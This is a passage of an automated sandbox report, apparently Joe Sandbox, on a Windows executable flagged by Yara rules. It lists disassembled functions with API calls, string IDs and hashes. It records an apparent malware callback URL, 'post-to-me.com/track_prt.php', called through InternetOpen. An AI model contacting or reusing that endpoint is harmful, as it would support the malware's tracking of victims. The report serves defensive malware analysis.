                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InternetOpen_wcslen
                                                            • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                            • API String ID: 3381584094-4083784958
                                                            • Opcode ID: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
                                                            • Instruction ID: ec99dba18f463ff9f93e46ea941d415f9bb699ba4462fac46a7023415d59b2d5
                                                            • Opcode Fuzzy Hash: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
                                                            • Instruction Fuzzy Hash: 02517295A65344A8E320EFB0BC52B353378FF58752F10643BE518CB2B2E7B19A44875E
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\GK059kPZ5B.exe,00000104), ref: 0042F773
                                                            • _free.LIBCMT ref: 0042F83E
                                                            • _free.LIBCMT ref: 0042F848
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\GK059kPZ5B.exe
                                                            • API String ID: 2506810119-3024341650
                                                            • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                            • Instruction ID: 2f2bce9173a2d2ca0187e045b48802aae097e8e7c4f0e2c97b909a8c245fc2df
                                                            • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                            • Instruction Fuzzy Hash: 47319371B00228ABDB21EF99AC8189FBBFCEF95314B90407BE80497211D7749E45CB59
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\GK059kPZ5B.exe,00000104), ref: 00A7F9DA
                                                            • _free.LIBCMT ref: 00A7FAA5
                                                            • _free.LIBCMT ref: 00A7FAAF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\GK059kPZ5B.exe
                                                            • API String ID: 2506810119-3024341650
                                                            • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                            • Instruction ID: f933a39f757d862190d0a7091f3508588c0b564afbb4c539439e52a05390445d
                                                            • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                            • Instruction Fuzzy Hash: 1B317C71A04218AFDB21DB999D8199EBBFCEF99750B10C0B6F90C97211D6709F40CB95
                                                            APIs
                                                            • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 00A73071
                                                              • Part of subcall function 00A68AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 00A68ADD
                                                            • SafeSQueue.LIBCONCRT ref: 00A7308A
                                                            • Concurrency::location::_Assign.LIBCMT ref: 00A7314A
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A7316B
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A73179
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                            • String ID: 11@
                                                            • API String ID: 3496964030-1785270423
                                                            • Opcode ID: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                            • Instruction ID: 9de9d4b8eba0e23d2e3b0754b0f256976e8a92e81af7b9f7dbfe2d0afb6db97a
                                                            • Opcode Fuzzy Hash: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                            • Instruction Fuzzy Hash: 2521C2367006019FCF15AF68CD90AA97BB1AF84310F1AC299ED5A8B356CB70ED05DB91
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00A821E4), ref: 00A7E220
                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00A821E4), ref: 00A7E25A
                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00A7E261
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                            • String ID: 11@
                                                            • API String ID: 1079102050-1785270423
                                                            • Opcode ID: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
                                                            • Instruction ID: 50d8bc9eb9d13bfd05edf69c35058f216d6e1a4193ad392225b0d9f116fa294d
                                                            • Opcode Fuzzy Hash: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
                                                            • Instruction Fuzzy Hash: 62113630640305ABFF04BB709E0BFAD3768AF08B04F10C5A8F9095B1D3EBB1994087A5
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00A821E4), ref: 00A7E220
                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00A821E4), ref: 00A7E25A
                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00A7E261
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                            • String ID: 11@
                                                            • API String ID: 1079102050-1785270423
                                                            • Opcode ID: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
                                                            • Instruction ID: bfd779b5cf063cfa1384ea1eab49eebd8c68766dfebfad12269788010967a880
                                                            • Opcode Fuzzy Hash: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
                                                            • Instruction Fuzzy Hash: 9D112970640305ABFF04BB709E0BFAD3768AF19B04F1085A8F9095B1D3DBB1994087A5
                                                            APIs
                                                            • SetLastError.KERNEL32(0000000D,?,0040DE66,0040C67E,?,?,00000000,?,0040C54E,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0040C67E), ref: 0040EFCF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: 11@$f(@
                                                            • API String ID: 1452528299-1277599000
                                                            • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                            • Instruction ID: 215b6f0c2c260135b977075f1765c75d61afaaca07cd8a2d2b7a33b83608daf3
                                                            • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                            • Instruction Fuzzy Hash: 24110236204117BFCF125F62DC4456BBB65FF08712B14443AF905AB290DA749820ABD5
                                                            APIs
                                                            • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00425F2D
                                                              • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F17
                                                              • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F2C
                                                            • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00425F60
                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00425F8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                            • String ID: 11@
                                                            • API String ID: 2684344702-1785270423
                                                            • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                            • Instruction ID: cb3a2859ed7aecbb53c8f7ff5db8590c6937c5e0b26f296ff23853c6e0f13c92
                                                            • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                            • Instruction Fuzzy Hash: CB01DB35700629ABCF01DF54D5808AE77B9EF89354B55006AEC06DB301DA34DE05DB60
                                                            APIs
                                                            • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00A76194
                                                              • Part of subcall function 00A75161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00A7517E
                                                              • Part of subcall function 00A75161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00A75193
                                                            • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00A761C7
                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A761F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                            • String ID: 11@
                                                            • API String ID: 2684344702-1785270423
                                                            • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                            • Instruction ID: 727946ba7790535962bfd4e8f839559127495e658777e35570e94e63782eb880
                                                            • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                            • Instruction Fuzzy Hash: 9201BE75600519AFCF05DF54C9949AE77F9EF89350B548075EC06D7301DB70DE059790
                                                            APIs
                                                            • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00411B62
                                                              • Part of subcall function 00410A71: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00410A84
                                                              • Part of subcall function 00410A71: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00410A8E
                                                            • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00411B7B
                                                            • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411BC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                            • String ID: 11@
                                                            • API String ID: 2524916244-1785270423
                                                            • Opcode ID: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                            • Instruction ID: 77abca4beb8e4c97e8764394de2025186321a16057fa486c0768a76d67dfeb06
                                                            • Opcode Fuzzy Hash: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                            • Instruction Fuzzy Hash: D201D6359042248BDF11AB50C450BFDB372AF84714F1440AADA116B3A5DBBCBE41C799
                                                            APIs
                                                            • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00A61DC9
                                                              • Part of subcall function 00A60CD8: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00A60CEB
                                                              • Part of subcall function 00A60CD8: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00A60CF5
                                                            • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00A61DE2
                                                            • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00A61E28
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                            • String ID: 11@
                                                            • API String ID: 2524916244-1785270423
                                                            • Opcode ID: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                            • Instruction ID: 2d28d5878072f97747fbe35c8cca0aa75cd620375e2b95afc8193dfcc316512c
                                                            • Opcode Fuzzy Hash: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                            • Instruction Fuzzy Hash: 7401DE39A00220CBDF15EBA0CA54BBEBBB2FF84310F1D4045D8026B385CB79AE05CB91
                                                            APIs
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA73
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                            • String ID: 11@$pContext
                                                            • API String ID: 1687795959-1086721755
                                                            • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                            • Instruction ID: 9010ffe1b6885ba769d18c3576365b3581292a7ba769087c8389302fb8d97d4f
                                                            • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                            • Instruction Fuzzy Hash: B5F0593AB006159BCB04EB59DC45C5EF7A8AF85B64710007BFD01E3342CFB8EE058698
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,004496AC,00000000,?,?,?,00A8011C,00000000,?,00A800BC,00000000,00457970,0000000C,00A80213,00000000,00000002), ref: 00A8018B
                                                            • GetProcAddress.KERNEL32(00000000,004496C4), ref: 00A8019E
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00A8011C,00000000,?,00A800BC,00000000,00457970,0000000C,00A80213,00000000,00000002), ref: 00A801C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: 11@
                                                            • API String ID: 4061214504-1785270423
                                                            • Opcode ID: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                            • Instruction ID: c319c65c5ed9698e27a4b3a1b1b77343cb68661b80a2d0dcda50c058e55372d0
                                                            • Opcode Fuzzy Hash: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                            • Instruction Fuzzy Hash: 91F06834600218FFDB11AF50DD49BAEBFB4EF05B12F110175F805A2150DB759E44DB54
                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A5C903
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Exception@8Throw
                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                            • API String ID: 2005118841-1866435925
                                                            • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                            • Instruction ID: 110221db1317248ca7ac7afd5caa6c84fb6b703d2b44cb2c6363b8faa5cdf16a
                                                            • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                            • Instruction Fuzzy Hash: 5EF0B173D003086ECB14EA54CD42BEA77A47B05367F14C056ED566A087E77C9D0DC795
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                            • ExitThread.KERNEL32 ref: 0042DFFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                            • String ID: f(@
                                                            • API String ID: 3213686812-2560262586
                                                            • Opcode ID: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                            • Instruction ID: 69bc41ef776010156a50f9e736d675acab369240ea0dcafc6817c09100241395
                                                            • Opcode Fuzzy Hash: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                            • Instruction Fuzzy Hash: 1FF0E260B8432639FA2037A2BD0BBAA16150F24B0DF96042BBE0A991C3DE9C9551416D
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog3_catchmake_shared
                                                            • String ID: MOC$RCC
                                                            • API String ID: 3472968176-2084237596
                                                            • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                            • Instruction ID: 3c58dbc467e7579ac58c57e4a59dc2af810355165cef31d5373baed2aef7ce1e
                                                            • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                            • Instruction Fuzzy Hash: DCF0FF71600514DFDF21AFA4CA02B6D7BB5AF05B40B4AC092F9445F322CB799E44CBA1
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                            • ExitThread.KERNEL32 ref: 0042DFFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                            • String ID: f(@
                                                            • API String ID: 3213686812-2560262586
                                                            • Opcode ID: 7b9273de92e7b6936eaf880de14e0e220afece78540420b5bcfd49e854584d78
                                                            • Instruction ID: 0285dfc7d7792d99b816c6e179ba3485ab9a4e2f62b66e3f0321d916b514c371
                                                            • Opcode Fuzzy Hash: 7b9273de92e7b6936eaf880de14e0e220afece78540420b5bcfd49e854584d78
                                                            • Instruction Fuzzy Hash: EEF0557078432535FA203BA2BD0FB961A240F10B0EF56002BBF09991C3DEEC9690416D
                                                            APIs
                                                            • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 00424319
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042432B
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00424339
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                            • String ID: pScheduler
                                                            • API String ID: 1381464787-923244539
                                                            • Opcode ID: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                            • Instruction ID: dcb9093c936754fa26cda4c49a5e66a6ec85891f206a073b4e5aa53fece02954
                                                            • Opcode Fuzzy Hash: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                            • Instruction Fuzzy Hash: 23F0A731B0122467C718FB55E842D9E77B99E403087D0816FB802A3182CF7CA949C69D
                                                            APIs
                                                            • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 00A6E8C6
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A6E8D9
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A6E8E7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                            • String ID: 11@
                                                            • API String ID: 1990795212-1785270423
                                                            • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                            • Instruction ID: 4161c85827e7815b08417fab0771bee0374036caf8b8ecdc6b9487e3ab47d4c7
                                                            • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                            • Instruction Fuzzy Hash: 89E06839B0010867CB00FB68DC0AC5DB7F9AEC0B11314802AFD15A3342DFB4AA08C6C4
                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E073
                                                            • FreeLibrary.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E082
                                                            • _free.LIBCMT ref: 0042E089
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CloseFreeHandleLibrary_free
                                                            • String ID: -B
                                                            • API String ID: 621396759-1993606306
                                                            • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                            • Instruction ID: 17050b68875c52b9acd6c54ac6ffc846a702ed9b00f998fe1c0864977ee07d81
                                                            • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                            • Instruction Fuzzy Hash: E9E08632101A34AFD7315F57F808B57BBD4EF15722F54C52AE41911560C7B9AD82CB9C
                                                            APIs
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DDA
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DE8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                            • String ID: pScheduler$version
                                                            • API String ID: 1687795959-3154422776
                                                            • Opcode ID: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                            • Instruction ID: 654ef00f808b34ad7b75b8e59998346ebad61dbc4125ce9a21f33dce7aa536fc
                                                            • Opcode Fuzzy Hash: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                            • Instruction Fuzzy Hash: 5CE04F30900608F6CB14AA55D80ABDD77A45B11749F60C02B7855610D29ABCA6D8CB4A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                            • Instruction ID: f9eb826db87fdf2ea4d980863b0040f81c60248b0af39ab0b887e88b27670142
                                                            • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                            • Instruction Fuzzy Hash: BEA14871A00B869FEB11DE18C8917AEFBE5EF19310F18426FE5859B381C27C9D41C799
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                            • Instruction ID: b37921a8380cf9cd12212e60b60a99fa8fa1f451312033c354b65497b7cb6d4f
                                                            • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                            • Instruction Fuzzy Hash: DBA13672E00B869FDB15EF78C8817AEBBE1EF62310F18416DED859B281D6389D41CB50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                            • Instruction ID: 944ec9a8cfd15a85abea22ed7e483bbecdcf94b25d0ac16da2a86ed09b95ce29
                                                            • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                            • Instruction Fuzzy Hash: E8414771E00210AADB247BBBDC52ABF76A8EF4D334F14127BF418C6291D67C9D49826D
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 9ac602f6531e549f45100aa0bb5cc862a8e670c03d425190f2dd11a7ce93b9af
                                                            • Instruction ID: d763d6caa8603fa3f96a4de60ee1732a4025e78b784ef9a98eb0d1d7987850b7
                                                            • Opcode Fuzzy Hash: 9ac602f6531e549f45100aa0bb5cc862a8e670c03d425190f2dd11a7ce93b9af
